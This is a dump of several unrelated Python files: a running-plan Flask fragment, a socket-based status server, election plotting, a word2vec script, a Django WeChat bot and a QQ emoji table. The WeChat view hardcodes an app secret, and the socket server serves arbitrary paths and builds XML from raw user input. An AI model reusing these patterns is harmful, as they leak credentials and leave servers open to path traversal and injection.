Easy run @ \" + easy + \", for 60 minutes. Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest.\",\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (0.90, [\"Marthon - 15 miles @ \" + marathon,\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (1.0, [\"Long run @ \" + easy + \", distance: \" + 0.25 * peak_mileage,\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (0.80, [\"Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest. Easy run @ \" + easy + \", for 60 minutes. Tempo 3 x 5 minutes @ \" + tempo + \", with 1 minute rest.\",\n \"Tempo 2 x 10 minutes @ \" + tempo + \", with 2 minute rest. Easy run @ \" + easy + \", for 75 minutes.\"]),\n (0.80, [\"Marathon run for 12 miles @ \" + marathon,\n \"Easy run @ \" + easy + \", for 2 miles. Tempo - 25 minutes @ \" + tempo + \", broken into 5 x 5 minutes with 1 minute rest.\"]),\n (0.60, [\"Two Easy runs @ \" + easy + \", total distance: \" + 0.162 * peak_mileage,\n \"Easy run @ \" + easy + \", for 2 miles. Tempo - 25 minutes @ \" + tempo + \", broken into 5 x 5 minutes with 1 minute rest\"])\n ]\n return training_plan\n\n\n@app.route(\"/generate-calendar\")\ndef creat_calendar():\n # change this to call off the user_id when you have login conf.\n VDOT = session[\"VDOT\"]\n user_id = session[\"user_id\"]\n # make a pace instance(s) ---> returns obj, see convert_timedelta() bellow\n easy = Pace(VDOT, \"easy\")\n marathon = Pace(VDOT, \"marathon\")\n tempo = Pace(VDOT, \"tempo\")\n\n # query for peak mileage\n user = User.query.filter(User.user_id == user_id).first()\n peak_mileage = user.weekly_mileage\n # call gen_taining_plan()\n user_plan = gen_training_plan(easy, marathon, tempo, peak_mileage)\n\n\n # 11/3 this may need to live in another place\n # 11/3 will call all EMT through this function, as for loop?\n # see workspace.py for more \"tests\"\ndef convert_timedelta(list):\n \"\"\"Return list of pace times converted from timedelta object\n\n >>> test = [1, 2, 3, 4, 5, 6, 7]\n >>> test1 = test[-5:]\n >>> print test1\n >>> [3, 4, 5, 6, 7]\"\"\"\n\n time_range = []\n for i in list:\n time_str = str(i)\n token_time = time_str.split(\".\")\n time = token_time[0]\n time = time[-5:]\n time_range.append(time)\n return time_range\n\n return render_template(\"training-plan.html\", training_plan=user_plan)\n\nif __name__ == \"__main__\":\n #must set to true befor invoking DebugToolbarExtension\n app.debug = True\n\n connect_to_db(app)\n\n # comment out to turn debug off\n DebugToolbarExtension(app)\n\n app.run()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"535235636","text":"\nfrom socket import *\nimport _thread\nfrom datetime import datetime, timedelta\nimport xml.etree.ElementTree as ET\n\n#user post status\t\ndef add_status(filename,message):\n\tif filename.split(\"/\")[-1] == 'new-status':\n\t\tstatusContent = message.split(\"\\n\")[15] #get status message from txt box\n\t\ttimestamp = datetime.now()\n\t\tlastmodified = datetime.now() #+ timedelta(seconds=600)\n\t\ttimestamp = timestamp.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\t\tlastmodified = lastmodified.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\t\tprint(statusContent,timestamp,lastmodified)\n\t\tupdate_status_xml(timestamp,lastmodified, 
statusContent)\n\t\ndef update_status_xml(timestamp, lastmodified, statusContent):\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\tparser = ET.XMLParser()\n\tparser.feed (\"\")\n\tparser.feed (\"\" + lastmodified + \"\")\n\tparser.feed (\"\" + timestamp + \"\")\n\tparser.feed (\"\" + statusContent + \"\")\n\tparser.feed (\"\")\n\tparser.feed (\"\")\n\telement = parser.close()\n\troot.append(element)\n\ttree.write(\"status.xml\")\n\n#user like friend status\ndef add_like(filename):\n\tif len(filename.split(\"/\")) > 3:\n\t\tif filename.split(\"/\")[-2] == \"like\":\n\t\t\tuserID = \"http://\" + filename.split(\"/\")[-3]\n\t\t\tStatusNumber = filename.split(\"/\")[-1]\n\t\t\tprint(userID,StatusNumber) # user like friend's x status\n\t\t\tupdate_status_like_xml(userID,StatusNumber)\n\ndef update_status_like_xml(userID,StatusNumber):\n\ttree = ET.parse(\"status.xml\") \n\troot = tree.getroot()\n\tstatus = root.findall(\".//status\")\n\tlikes = status[int(StatusNumber)].find(\"likes\")\n\tlastModified = status[int(StatusNumber)].find(\"lastModified\")\n\t\n\tparser = ET.XMLParser()\n\tparser.feed (\"\" + userID + \"\" )\n\tIPaddressElement = parser.close()\n\t\n\tlastModifiedTime = datetime.now() #+ timedelta(seconds=600) \n\tlastModifiedTime = lastModifiedTime.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\t\t\n\tparser = ET.XMLParser()\n\tparser.feed (\"\" + lastModifiedTime + \"\")\n\tlastModifiedElement = parser.close()\n\t\n\t\n\tlikes.append(IPaddressElement)\n\tlastModified.text = lastModifiedElement.text \n\t\n\ttree.write(\"status.xml\")\n\treturn\n\ndef cache_for_updatePage () :\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\tlastModifiedElements = root.findall(\".//lastModified\")\n\tlast_modified = \"\"\n\tif (len (lastModifiedElements) > 0 ):\n\t\tlast_modified = lastModifiedElements[0].text \n\t\tfor e in lastModifiedElements:\n\t\t\tif (e.text > last_modified):\n\t\t\t\tlast_modified = e.text\n\t\t#last_modified = \"Last-Modified: \" + last_modified + \"\\r\\n\" # find last updated like / status\n\t\n\treturn last_modified\n\t\ndef update_ifModifiedSince () :\t\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\ttimestamp = datetime.utcnow()\n\ttimestamp = timestamp.strftime('%a, %d %b %Y %H:%M:%S GMT') \n\tifModifiedSince= root.find(\"ifModifiedSince\")\n\tifModifiedSince.text = timestamp\n\ttree.write(\"status.xml\")\n\ndef Access_Control_Allow_Origin(message):\n\torigin = message.split()[-3]\n\ttree = ET.parse(\"status.xml\")\n\troot = tree.getroot()\n\tallowed_ip = \"\"\n\tfriendsIP = root.find(\"friendlist\")\n\tfor ip in friendsIP:\n\t\tif ( ip.text == origin ):\n\t\t\tallowed_ip = ip.text \n\t\n\treturn \"Access-Control-Allow-Origin:\" + allowed_ip + \"\\r\\n\"\n\t\t\ndef process(connectionSocket) :\t\n\t# Receives the request message from the client\n\tmessage = connectionSocket.recv(1024).decode()\n\tif len(message) > 1:\n\t\ttry:\n\t\t\t# Extract the path of the requested object from the message\n\t\t\t#print(message)\n\t\t\t\n\t\t\tcontentType = \"\"\n\t\t\tcache = \"\"\n\t\t\tAccessControlAllowOriginHeader = \"\"\n\t\t\toutputdata = \"\"\n\t\t\t\n\t\t\tfilename = message.split()[1]\n\t\t\tprint(filename)\n\t\t\t\n\t\t\tadd_status(filename,message)\n\t\t\tadd_like(filename)\n\n\t\t\t\t\t\n\t\t\tf = open(filename[1:],\"rb\")\t\n\t\t\toutputdata = f.read()\t\n\t\t\t\n\t\t\tif filename.endswith(\"html\"):\n\t\t\t\tcontentType = \"text/html\"\n\t\t\t\tlast_modified = cache_for_updatePage ()\n\t\t\t\tcache = \"Cache-Control: private, 
max-age = 60 \\r\\n\" + \"Last-Modified:\" + last_modified + \"\\r\\n\" + \"Expires: -1\\r\\n\" \n\t\t\t\t\n\t\t\tif filename.endswith(('png', 'jpg')):\n\t\t\t\tcontentType = \"image/\"+filename.split('.')[-1]\n\t\t\tif filename.endswith(\"xml\"):\n\t\t\t\tAccessControlAllowOriginHeader = Access_Control_Allow_Origin(message)\n\t\t\t\t#update_ifModifiedSince () \n\t\t\t\tlast_modified = cache_for_updatePage ()\n\t\t\t\tcache = \"Cache-Control: private, max-age = 60 \\r\\n\" + \"Last-Modified:\" + last_modified + \"\\r\\n\" + \"Expires: -1\\r\\n\" \n\t\t\t\t\n\t\t\t\t\t\n\t\t\tconnectionSocket.send((\"HTTP/1.1 200 OK Content-Type:\"+ contentType + \"\\r\\n\" + cache + AccessControlAllowOriginHeader + \"\\r\\n\" ).encode())\n\t\t\tconnectionSocket.send(outputdata)\n\t\t\tconnectionSocket.close()\n\t\t\t\n\t\texcept IOError:\n\t\t\t# Send HTTP response message for file not found\n\t\t\tconnectionSocket.send(\"HTTP/1.1 404 Not Found\\r\\n\\r\\n\".encode())\n\t\t\tconnectionSocket.send(\"
<html><head></head><body><h1>404 Not Found</h1></body></html>
\\r\\n\".encode())\n\t\t\tconnectionSocket.close()\n\ndef server(serverPort):\n\n\tserverSocket = socket(AF_INET, SOCK_STREAM)\n\tserverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n\tserverSocket.bind((\"\", serverPort))\n\tserverSocket.listen(5)\n\t\n\t\n\tprint(\"The server is running Port Numebr: \" + str(serverPort) )\t\n\t# Server should be up and running and listening to the incoming connections\n\t\n\twhile True:\n\t\t\n\t\t# Set up a new connection from the client\n\t\tconnectionSocket, addr = serverSocket.accept()\n\t\t#Clients timeout after 60 seconds of inactivity and must reconnect.\n\t\tconnectionSocket.settimeout(60)\n\t\t# start new thread to handle incoming request\n\t\n\t\t_thread.start_new_thread(process,(connectionSocket,))\n\t\n\tserverSocket.close() \n\nserver(8080)\n","sub_path":"Assignment1/user1/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"424658443","text":"import pandas as pd\nimport seaborn as sns \nfrom pandas import DataFrame\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport numpy as np\nimport plotly\n\n\n#open the file\ng=pd.read_csv('2017_german_election_party.csv')\nprint(g.columns)\ndf=DataFrame(g)\n\nprint(df.head(3))\n\narea=df['area_name']\nstate=df['state']\nparty=df['party']\nvotes1=df['votes_first_vote']\nvotes2=df['votes_second_vote']\narea_id=['area_id']\n\nfig = go.Figure(data=go.Heatmap(\n z=votes2,\n x=state,\n y=party,\n colorscale='Viridis'))\n\nfig.update_layout(\n title='Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_g')\n\nfig.show()\n\n#scatter\n\ncdu=df[df.party=='Christlich.Demokratische.Union.Deutschlands']\nafd=df[df.party=='Alternative.für.Deutschland']\nB=df[df.state=='Berlin']\n\nfig = px.scatter(cdu, x=\"state\", y=\"votes_second_vote\", color=\"votes_second_vote\",\n size='votes_second_vote', hover_data=['votes_second_vote'],\n color_continuous_scale='Teal')\n\nplotly.offline.plot(fig, filename='votes_S')\n\n\nfig = px.scatter(B, x=\"party\", y=\"votes_second_vote\", color=\"votes_second_vote\",\n size='votes_first_vote', hover_data=['votes_first_vote'],\n color_continuous_scale='Tealgrn')\n\nplotly.offline.plot(fig, filename='votes_S')\n\n\nfig = px.scatter(df, x=\"party\", y=\"votes_second_vote\", color=\"votes_second_vote\",\n size='votes_second_vote', hover_data=['votes_second_vote'])\n\nplotly.offline.plot(fig, filename='votes_S')\n\n#elections overall g\n\nde=pd.read_csv('2017_german_election_overall.csv')\nprint(de.columns)\ndf=DataFrame(de)\n\nprint(df.head(3))\nprint(df.columns)\n\n#Heatmaps\n\narea=df['area_names']\nstate=df['state']\nregistered_voters=df['registered.voters']\nvalid_votes1=df['valid_first_votes']\ninvalid_second_votes=df['invalid_second_votes']\ninvalid_first_votes=df['invalid_first_votes']\nvalid_votes2=df['valid_second_votes']\ntotal_votes=df['total_votes']\n\nfig = go.Figure(data=go.Heatmap( \n x=state,\n y=valid_votes2,\n z=registered_voters,\n colorscale='RdBu'))\n\nfig.update_layout(\n title='Presence of Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_overall')\n\n#invalid second\nfig = go.Figure(data=go.Heatmap( \n x=state,\n y=invalid_second_votes,\n z=registered_voters,\n colorscale='Teal'))\n\nfig.update_layout(\n title='Invalid second Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, 
filename='votes_overall')\n\n#invalid first\n\nfig = go.Figure(data=go.Heatmap( \n x=state,\n y=invalid_first_votes,\n z=registered_voters,\n colorscale='Tealgrn'))\n\nfig.update_layout(\n title='Invalid first Votes in Germany 2017',\n xaxis_nticks=18)\n\n\nplotly.offline.plot(fig, filename='votes_overall')\n\n\nfig = go.Figure(data=go.Scatter(\n x=party,\n y=['votes_second_vote'],\n mode='markers',\n marker=dict(size=[40, 60, 80, 100],\n color=[0, 1, 2, 3,4,5,6])\n))\nplotly.offline.plot(fig, filename='votes_overall')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"elections_2017.py","file_name":"elections_2017.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"561982933","text":"import logging\nimport os\n\n\nclass ModelLogger:\n \"\"\"A logger specific for the tasks of the ModelAdvancer\"\"\"\n\n def __init__(self):\n logging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n self.logger = logging.getLogger('simulation')\n self.formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n self.fh = logging.FileHandler('model_logger.log')\n self.fh.setFormatter(self.formatter)\n self.logger.addHandler(self.fh)\n","sub_path":"alfalfa_worker/step_sim/model_logger.py","file_name":"model_logger.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"457375600","text":"import gensim\nimport math\ntrainFile='./training_label.txt'\nunlabelFile='./training_nolabel.txt'\ngensimFile='./vectors_gensim.txt'\ntokens=[]\nwith open(trainFile,'r',encoding='utf-8') as file:\n lines=file.readlines()\nfor i in range(len(lines)):\n tmpline=lines[i].split(' +++$+++ ')[1]\n tmpline=tmpline.replace(\" ' \", \"\")\n tmpline=tmpline.replace(\"\\n\", \"\")\n tmp=tmpline.split(' ')\n tokens.append(tmp)\n\nwith open(unlabelFile,'r',encoding='utf-8') as file:\n lines=file.readlines()\nfor i in range(len(lines)):\n lines[i]=lines[i].replace(\" ' \", \"\")\n lines[i]=lines[i].replace(\"\\n\", \"\")\n tmp=lines[i].split(' ')\n tokens.append(tmp)\n \nmodel=gensim.models.Word2Vec(size=300,min_count=13,alpha=0.005)\nmodel.build_vocab(tokens,keep_raw_vocab=False,trim_rule=None,progress_per=10000,update=False)\nmodel.train(tokens,total_examples=model.corpus_count,epochs=model.iter)\nmodel.wv.save_word2vec_format(gensimFile)","sub_path":"hw4/gensim_train.py","file_name":"gensim_train.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"437608467","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom django.http.response import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic.base import View\n\nfrom models import Fowler, Dialog, Location, Function\n\nfrom wechat_sdk import WechatConf, WechatBasic\nfrom wechat_sdk.exceptions import ParseError\nfrom wechat_sdk.messages import TextMessage, LocationMessage, EventMessage\n\n# 微信SDK配置\nconf = WechatConf(token='dfsdsg1g23s1gs53',\n appid='wxbc1c4c2e398996f7',\n appsecret='42b511b04df169de9c90e5b9509a1919',\n encrypt_mode='normal',\n )\nwechat = WechatBasic(conf=conf)\n\n\nclass Weixin(View):\n @csrf_exempt\n def dispatch(self, *args, **kwargs):\n return super(Weixin, self).dispatch(*args, **kwargs)\n\n def get(self, request):\n signature = request.GET.get('signature', None)\n timestamp = 
request.GET.get('timestamp', None)\n nonce = request.GET.get('nonce', None)\n echostr = request.GET.get('echostr', None)\n\n if wechat.check_signature(signature, timestamp, nonce):\n return HttpResponse(echostr)\n\n def post(self, request):\n try:\n wechat.parse_data(request.body)\n except ParseError:\n return HttpResponse('Invalid Body Text')\n\n id = wechat.message.id # MsgId\n target = wechat.message.target # ToUserName\n source = wechat.message.source # FromUserName\n time = wechat.message.time # CreateTime\n type = wechat.message.type # MsgType\n raw = wechat.message.raw # 原始 XML 文本\n\n # get_or_create会得到一个tuple (object, created)\n fowler = Fowler.objects.get_or_create(OpenID=source)[0]\n\n if isinstance(wechat.message, TextMessage):\n keywords = [func.keyword for func in Function.objects.all()]\n content = wechat.message.content # 对应于 XML 中的 Content\n if content in keywords:\n reply = Function.objects.get(keyword=content).explain\n else:\n reply = '本公众号支持的回复有: \\n' + ' '.join(keywords)\n\n dialog = Dialog(message=content, reply=reply, fowler=fowler)\n dialog.save()\n response_xml = wechat.response_text(content=reply, escape=True)\n return HttpResponse(response_xml)\n\n elif isinstance(wechat.message, LocationMessage):\n location = wechat.message.location # Tuple(Location_X, Location_Y)\n scale = wechat.message.scale # 地图缩放大小\n label = wechat.message.label # 地理位置\n\n loc = Location(fowler=fowler, x=location[0], y=location[1], label=label)\n loc.save()\n response_xml = wechat.response_text(content='已收到您的地理位置')\n return HttpResponse(response_xml)\n\n elif isinstance(wechat.message, EventMessage):\n if wechat.message.type == 'subscribe':\n fowler.activate = 1\n fowler.save()\n response_xml = wechat.response_text(content='欢迎关注本公众号 具体功能请回复‘功能’')\n return HttpResponse(response_xml)\n elif wechat.message.type == 'unsubscribe':\n fowler.activate = 0\n fowler.save()\n else:\n response_xml = wechat.response_text(content=\"回复'功能'了解本公众号提供的查询功能\")\n return HttpResponse(response_xml)\n\n\n\n","sub_path":"weixin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"93992813","text":"import asyncio\n\nfrom mirai_core import Bot, Updater\nfrom mirai_core.models.Event import Message, BotOnlineEvent\nfrom mirai_core.models.Types import MessageType\nfrom mirai_core.models.Message import MessageChain, Image, Plain, At, AtAll, Face, Source, Quote, FlashImage\n\nfrom unified_message_relay.Core.UMRType import ChatType, UnifiedMessage, MessageEntity, EntityType, ChatAttribute\nfrom unified_message_relay.Core.UMRMessageRelation import set_ingress_message_id, set_egress_message_id\nfrom unified_message_relay.Core.UMRDriver import BaseDriverMixin\nfrom unified_message_relay.Core import UMRDriver\nfrom unified_message_relay.Core import UMRLogging\nfrom unified_message_relay.Core import UMRConfig\nfrom typing import Union, Dict, List, Tuple\nfrom typing_extensions import Literal\nfrom pydantic import Field\nimport threading\n\nqq_emoji_list = { # created by JogleLew and jqqqqqqqqqq, optimized based on Tim's emoji support\n 0: '😮',\n 1: '😣',\n 2: '😍',\n 3: '😳',\n 4: '😎',\n 5: '😭',\n 6: '☺️',\n 7: '😷',\n 8: '😴',\n 9: '😭',\n 10: '😰',\n 11: '😡',\n 12: '😝',\n 13: '😃',\n 14: '🙂',\n 15: '🙁',\n 16: '🤓',\n 17: '[Empty]',\n 18: '😤',\n 19: '😨',\n 20: '😏',\n 21: '😊',\n 22: '🙄',\n 23: '😕',\n 24: '🤤',\n 25: '😪',\n 26: '😨',\n 27: '😓',\n 28: '😬',\n 29: '🤑',\n 30: '✊',\n 31: '😤',\n 32: '🤔',\n 33: '🤐',\n 34: 
'😵',\n 35: '😩',\n 36: '💣',\n 37: '💀',\n 38: '🔨',\n 39: '👋',\n 40: '[Empty]',\n 41: '😮',\n 42: '💑',\n 43: '🕺',\n 44: '[Empty]',\n 45: '[Empty]',\n 46: '🐷',\n 47: '[Empty]',\n 48: '[Empty]',\n 49: '🤷',\n 50: '[Empty]',\n 51: '[Empty]',\n 52: '[Empty]',\n 53: '🎂',\n 54: '⚡',\n 55: '💣',\n 56: '🔪',\n 57: '⚽️',\n 58: '[Empty]',\n 59: '💩',\n 60: '☕️',\n 61: '🍚',\n 62: '[Empty]',\n 63: '🌹',\n 64: '🥀',\n 65: '[Empty]',\n 66: '❤️',\n 67: '💔️',\n 68: '[Empty]',\n 69: '🎁',\n 70: '[Empty]',\n 71: '[Empty]',\n 72: '[Empty]',\n 73: '[Empty]',\n 74: '🌞️',\n 75: '🌃',\n 76: '👍',\n 77: '👎',\n 78: '🤝',\n 79: '✌️',\n 80: '[Empty]',\n 81: '[Empty]',\n 82: '[Empty]',\n 83: '[Empty]',\n 84: '[Empty]',\n 85: '🥰',\n 86: '[怄火]',\n 87: '[Empty]',\n 88: '[Empty]',\n 89: '🍉',\n 90: '[Empty]',\n 91: '[Empty]',\n 92: '[Empty]',\n 93: '[Empty]',\n 94: '[Empty]',\n 95: '[Empty]',\n 96: '😅',\n 97: '[擦汗]',\n 98: '[抠鼻]',\n 99: '👏',\n 100: '[糗大了]',\n 101: '😏',\n 102: '😏',\n 103: '😏',\n 104: '🥱',\n 105: '[鄙视]',\n 106: '😭',\n 107: '😭',\n 108: '[阴险]',\n 109: '😚',\n 110: '🙀',\n 111: '[可怜]',\n 112: '🔪',\n 113: '🍺',\n 114: '🏀',\n 115: '🏓',\n 116: '❤️',\n 117: '🐞',\n 118: '[抱拳]',\n 119: '[勾引]',\n 120: '✊',\n 121: '[差劲]',\n 122: '🤟',\n 123: '🚫',\n 124: '👌',\n 125: '[转圈]',\n 126: '[磕头]',\n 127: '[回头]',\n 128: '[跳绳]',\n 129: '👋',\n 130: '[激动]',\n 131: '[街舞]',\n 132: '😘',\n 133: '[左太极]',\n 134: '[右太极]',\n 135: '[Empty]',\n 136: '[双喜]',\n 137: '🧨',\n 138: '🏮',\n 139: '💰',\n 140: '[K歌]',\n 141: '🛍️',\n 142: '📧',\n 143: '[帅]',\n 144: '👏',\n 145: '🙏',\n 146: '[爆筋]',\n 147: '🍭',\n 148: '🍼',\n 149: '[下面]',\n 150: '🍌',\n 151: '🛩',\n 152: '🚗',\n 153: '🚅',\n 154: '[车厢]',\n 155: '[高铁右车头]',\n 156: '🌥',\n 157: '下雨',\n 158: '💵',\n 159: '🐼',\n 160: '💡',\n 161: '[��车]',\n 162: '⏰',\n 163: '🌂',\n 164: '[彩球]',\n 165: '💍',\n 166: '🛋',\n 167: '[纸巾]',\n 168: '💊',\n 169: '🔫',\n 170: '🐸',\n 171: '🍵',\n 172: '[眨眼睛]',\n 173: '😭',\n 174: '[无奈]',\n 175: '[卖萌]',\n 176: '[小纠结]',\n 177: '[喷血]',\n 178: '[斜眼笑]',\n 179: '[doge]',\n 180: '[惊喜]',\n 181: '[骚扰]',\n 182: '😹',\n 183: '[我最美]',\n 184: '🦀',\n 185: '[羊驼]',\n 186: '[Empty]',\n 187: '👻',\n 188: '🥚',\n 189: '[Empty]',\n 190: '🌼',\n 191: '[Empty]',\n 192: '🧧',\n 193: '😄',\n 194: '😞',\n 195: '[Empty]',\n 196: '[Empty]',\n 197: '[冷漠]',\n 198: '[呃]',\n 199: '👍',\n 200: '👋',\n 201: '👍',\n 202: '[无聊]',\n 203: '[托脸]',\n 204: '[吃]',\n 205: '💐',\n 206: '😨',\n 207: '[花痴]',\n 208: '[小样儿]',\n 209: '[Empty]',\n 210: '😭',\n 211: '[我不看]',\n 212: '[托腮]',\n 213: '[Empty]',\n 214: '😙',\n 215: '[糊脸]',\n 216: '[拍头]',\n 217: '[扯一扯]',\n 218: '[舔一舔]',\n 219: '[蹭一蹭]',\n 220: '[拽炸天]',\n 221: '[顶呱呱]',\n 222: '🤗',\n 223: '[暴击]',\n 224: '🔫',\n 225: '[撩一撩]',\n 226: '[拍桌]',\n 227: '👏',\n 228: '[恭喜]',\n 229: '🍻',\n 230: '[嘲讽]',\n 231: '[哼]',\n 232: '[佛系]',\n 233: '[掐一掐]',\n 234: '😮',\n 235: '[颤抖]',\n 236: '[啃头]',\n 237: '[偷看]',\n 238: '[扇脸]',\n 239: '[原谅]',\n 240: '[喷脸]',\n 241: '🎂',\n 242: '[Empty]',\n 243: '[Empty]',\n 244: '[Empty]',\n 245: '[Empty]',\n 246: '[Empty]',\n 247: '[Empty]',\n 248: '[Empty]',\n 249: '[Empty]',\n 250: '[Empty]',\n 251: '[Empty]',\n 252: '[Empty]',\n 253: '[Empty]',\n 254: '[Empty]',\n 255: '[Empty]',\n}\n\n# original text copied from Tim\nqq_emoji_text_list = {\n 0: '[惊讶]',\n 1: '[撇嘴]',\n 2: '[色]',\n 3: '[发呆]',\n 4: '[得意]',\n 5: '[流泪]',\n 6: '[害羞]',\n 7: '[闭嘴]',\n 8: '[睡]',\n 9: '[大哭]',\n 10: '[尴尬]',\n 11: '[发怒]',\n 12: '[调皮]',\n 13: '[呲牙]',\n 14: '[微笑]',\n 15: '[难过]',\n 16: '[酷]',\n 17: '[Empty]',\n 18: '[抓狂]',\n 19: '[吐]',\n 20: '[偷笑]',\n 21: '[可爱]',\n 22: '[白眼]',\n 23: '[傲慢]',\n 24: '[饥饿]',\n 25: '[困]',\n 26: 
'[惊恐]',\n 27: '[流汗]',\n 28: '[憨笑]',\n 29: '[悠闲]',\n 30: '[奋斗]',\n 31: '[咒骂]',\n 32: '[疑问]',\n 33: '[嘘]',\n 34: '[晕]',\n 35: '[折磨]',\n 36: '[衰]',\n 37: '[骷髅]',\n 38: '[敲打]',\n 39: '[再见]',\n 40: '[Empty]',\n 41: '[发抖]',\n 42: '[爱情]',\n 43: '[跳跳]',\n 44: '[Empty]',\n 45: '[Empty]',\n 46: '[猪头]',\n 47: '[Empty]',\n 48: '[Empty]',\n 49: '[拥抱]',\n 50: '[Empty]',\n 51: '[Empty]',\n 52: '[Empty]',\n 53: '[蛋糕]',\n 54: '[闪电]',\n 55: '[炸弹]',\n 56: '[刀]',\n 57: '[足球]',\n 58: '[Empty]',\n 59: '[便便]',\n 60: '[咖啡]',\n 61: '[饭]',\n 62: '[Empty]',\n 63: '[玫瑰]',\n 64: '[凋谢]',\n 65: '[Empty]',\n 66: '[爱心]',\n 67: '[心碎]',\n 68: '[Empty]',\n 69: '[礼物]',\n 70: '[Empty]',\n 71: '[Empty]',\n 72: '[Empty]',\n 73: '[Empty]',\n 74: '[太阳]',\n 75: '[月亮]',\n 76: '[赞]',\n 77: '[踩]',\n 78: '[握手]',\n 79: '[胜利]',\n 80: '[Empty]',\n 81: '[Empty]',\n 82: '[Empty]',\n 83: '[Empty]',\n 84: '[Empty]',\n 85: '[飞吻]',\n 86: '[怄火]',\n 87: '[Empty]',\n 88: '[Empty]',\n 89: '[西瓜]',\n 90: '[Empty]',\n 91: '[Empty]',\n 92: '[Empty]',\n 93: '[Empty]',\n 94: '[Empty]',\n 95: '[Empty]',\n 96: '[冷汗]',\n 97: '[擦汗]',\n 98: '[抠鼻]',\n 99: '[鼓掌]',\n 100: '[糗大了]',\n 101: '[坏笑]',\n 102: '[左哼哼]',\n 103: '[右哼哼]',\n 104: '[哈欠]',\n 105: '[鄙视]',\n 106: '[委屈]',\n 107: '[快哭了]',\n 108: '[阴险]',\n 109: '[亲亲]',\n 110: '[吓]',\n 111: '[可怜]',\n 112: '[菜刀]',\n 113: '[啤酒]',\n 114: '[篮球]',\n 115: '[乒乓]',\n 116: '[示爱]',\n 117: '[瓢虫]',\n 118: '[抱拳]',\n 119: '[勾引]',\n 120: '[拳头]',\n 121: '[差劲]',\n 122: '[爱你]',\n 123: '[NO]',\n 124: '[OK]',\n 125: '[转圈]',\n 126: '[磕头]',\n 127: '[回头]',\n 128: '[跳绳]',\n 129: '[挥手]',\n 130: '[激动]',\n 131: '[街舞]',\n 132: '[献吻]',\n 133: '[左太极]',\n 134: '[右太极]',\n 135: '[Empty]',\n 136: '[双喜]',\n 137: '[鞭炮]',\n 138: '[灯笼]',\n 139: '[发财]',\n 140: '[K歌]',\n 141: '[购物]',\n 142: '[邮件]',\n 143: '[帅]',\n 144: '[喝彩]',\n 145: '[祈祷]',\n 146: '[爆筋]',\n 147: '[棒棒糖]',\n 148: '[喝奶]',\n 149: '[下面]',\n 150: '[香蕉]',\n 151: '[飞机]',\n 152: '[开车]',\n 153: '[高铁左车头]',\n 154: '[车厢]',\n 155: '[高铁右车头]',\n 156: '[多云]',\n 157: '[下雨]',\n 158: '[钞票]',\n 159: '[熊猫]',\n 160: '[灯泡]',\n 161: '[风车]',\n 162: '[闹钟]',\n 163: '[打伞]',\n 164: '[彩球]',\n 165: '[钻戒]',\n 166: '[沙发]',\n 167: '[纸巾]',\n 168: '[药]',\n 169: '[手枪]',\n 170: '[青蛙]',\n 171: '[茶]',\n 172: '[眨眼睛]',\n 173: '[泪奔]',\n 174: '[无奈]',\n 175: '[卖萌]',\n 176: '[小纠结]',\n 177: '[喷血]',\n 178: '[斜眼笑]',\n 179: '[doge]',\n 180: '[惊喜]',\n 181: '[骚扰]',\n 182: '[笑哭]',\n 183: '[我最美]',\n 184: '[河蟹]',\n 185: '[羊驼]',\n 186: '[Empty]',\n 187: '[幽灵]',\n 188: '[蛋]',\n 189: '[Empty]',\n 190: '[菊花]',\n 191: '[Empty]',\n 192: '[红包]',\n 193: '[大笑]',\n 194: '[不开心]',\n 195: '[Empty]',\n 196: '[Empty]',\n 197: '[冷漠]',\n 198: '[呃]',\n 199: '[好棒]',\n 200: '[拜托]',\n 201: '[点赞]',\n 202: '[无聊]',\n 203: '[托脸]',\n 204: '[吃]',\n 205: '[送花]',\n 206: '[害怕]',\n 207: '[花痴]',\n 208: '[小样儿]',\n 209: '[Empty]',\n 210: '[飙泪]',\n 211: '[我不看]',\n 212: '[托腮]',\n 213: '[Empty]',\n 214: '[啵啵]',\n 215: '[糊脸]',\n 216: '[拍头]',\n 217: '[扯一扯]',\n 218: '[舔一舔]',\n 219: '[蹭一蹭]',\n 220: '[拽炸天]',\n 221: 